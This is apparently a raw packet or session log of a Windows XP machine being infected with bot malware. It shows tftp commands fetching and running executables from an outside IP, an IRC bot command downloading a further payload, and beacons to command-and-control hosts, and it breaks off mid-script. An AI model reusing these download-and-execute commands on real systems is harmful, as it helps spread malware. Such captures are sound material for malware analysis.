VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.
VICTIM: C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
VICTIM: Volume Serial Number is 3CF1-1DE8
VICTIM: Directory of C:\\WINDOWS\\system32\\wins
VICTIM: File Not Found
VICTIM: C:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
VICTIM: Volume Serial Number is 3CF1-1DE8
VICTIM: Directory of C:\\WINDOWS\\system32\\dllcache
VICTIM: File Not Found
VICTIM: C:\\WINDOWS\\system32>
VICTIM: tftp -i 70.167.233.120 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000\n
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000\r
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\"
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 5 seconds, 5891 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: tftp -i 70.167.233.120 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000\n
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000\r
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\"
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 4 seconds, 4992 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK yhgmpnhx
VICTIM: USER f020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG yhgmpnhx :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe
VICTIM: GET /p/out/kp.exe HTTP/1.0
VICTIM: User-Agent: Download
VICTIM: Host: shabi.coolnuff.com:2012
VICTIM: Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B1669C2DCEECA9E5FF8F6D1DFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=9.782046E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /myck.jpg?t=0.2562677 HTTP/1.0
ATTACKER: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
ATTACKER: Host: ru.coolnuff.com:2011
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /sn.php?c=E1FFF3175ECE28B7DAC1042F74324F8A6DA67244F7D79D03380830799F493F19C7966C87714C752B650F157833233AD131C79B72235227077411F68BE89095083163E94EC91A029DFEC488F21DF3B56A13E4F8C5037DA5A3A103761B53B0981064359A87D4CF88137CCFDD5AAFAF4AD0798E597623647156B5ECD1BE7BCD71CFE6EFF15B3D0F00C7F3C6D780A561C2BE&t=0.5794947 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=584650B403930897D1CA5A71C6805E9B2FE45E689DBD68F69FAFA7EE3EE8587E99C898730A375608B8D23558889822C9C93FE40D1160FADA21447508CDB5BE23346661C6DD0E52CD645E4F35DA34449B17E0DDE07F01AFA90CAE9CF1A2415FD7EFBE5C41697235AE2B98AB3DBA43CD45FF0A98C6F3A05F6DD4C0BCC9DC7EE319CEDE7CD6D9ED79C6A19488D065A50787A67D&t=0.414715 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /ck3.jpg?t=0.1766168 HTTP/1.0
ATTACKER: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
ATTACKER: Host: ru.coolnuff.com:2011
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-0E-2C-21&Publicer=100 HTTP/1.0
ATTACKER: User-Agent: CA 0.0.0.2
ATTACKER: Host: myck.nucleardiscover.com:88
ATTACKER: GET /sn.php?c=26385EBA0393D971F813ECB28DF5E62416890365302E79E12346CCBF4CE20A51074E9B8EAB94C29E94FE0C7E4F4334DF699251BB6FF0486A1723CAB7BCCB77E983FCD67EE83B3EA18BB1EA906987CC13ED1AE0DD7B05FEF864C691FC64878E061342A5B8FBE0871C2794AA2D6B6BFD67B94E644B3572FADDF1A8640B74C2BB05717DDC7565541DA2F1C8B2E226E1&t=0.6061823 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=AAB4E60258C88129BB505D033B43438175EA6F09819F3BA3690C3D4E59F732694F066F7A5966B0EC9BF1780AB7BB658E50AB1CF6BB24C7E5192D304D7403FD6396E9A20AAB78FC63F4CEB9C315FBF02FC0379DA0CCB2DDDBFD5F197400E3860E7425A0BDEAF18E154BF88E1802FBDD55D92CB1EF72214577B9AD087DCA68659F1D0DCA60F5C3CE0B6556AAFA6CAF65E7F12C&t=0.7630426 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-0E-2C-21&Publicer=100 HTTP/1.0
ATTACKER: User-Agent: CA 0.0.0.2
ATTACKER: Host: ck3.nucleardiscover.com:88
ATTACKER: GET / HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
ATTACKER: Host: insuranceenquire.com
ATTACKER: Connection: Keep-Alive
ATTACKER: GET /?o_id=62461&domainname=insuranceenquire.com HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
ATTACKER: Host: searchportal.information.com
ATTACKER: Connection: Keep-Alive
ATTACKER: GET /apps/domainpark/show_afd_ads.js HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: Referer: http:/searchportal.information.com/?o_id=62461&domainname=insuranceenquire.com
ATTACKER: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
ATTACKER: Host: pagead2.googlesyndication.com
ATTACKER: Connection: Keep-Alive
ATTACKER: HTTP/1.0 200 OKLast-Modified: Thu, 04 Aug 2011 18:35:44 GMTContent-Type: text/javascript; charset=UTF-8Date: Tue, 09 Aug 2011 21:15:37 GMTExpires: Wed, 10 Aug 2011 21:15:37 GMTX-Content-Type-Options: nosniffContent-Disposition: attachmentServer: domainserverAge: 10554Cache-Control: public, max-age=86400(function(){var f=null,h=function(a){var b=typeof a;if(b==\object\)if(a){if(a instanceof Array)return\array\;else if(a instanceof Object)return b;var c=Object.prototype.toString.call(a);if(c==\[object Window]\)return\object\;if(c==\[object Array]\||typeof a.length==umber\&&typeof a.splice!=\undefined\&&typeof a.propertyIsEnumerable!=\undefined\&&!a.propertyIsEnumerable(\splice\))return\array\;if(c==\[object Function]\||typeof a.call!=\undefined\&&typeof a.propertyIsEnumerable!=\undefined\&&!a.propertyIsEnumerable(\call\))return\function\}else returnull\;else if(b==\function\&&typeof a.call==\undefined\)return\object\;return b};function i(a,b,c){c!=f&&c!==\\&&(a+=encodeURIComponent(b)+\=\+encodeURIComponent(c)+\&\);return a}function _google_json_callback(a){j();var b=\google_afd_ad_request_done\;if(window[b])window[b](a)}function k(a,b){var c=document;window._google_json_callback=_google_json_callback;if(b){var d=c.createElement(\script\);d.src=a;d.async=!0;c=c.getElementsByTagName(\script\)[0];c.parentNode.insertBefore(d,c)}else c.write('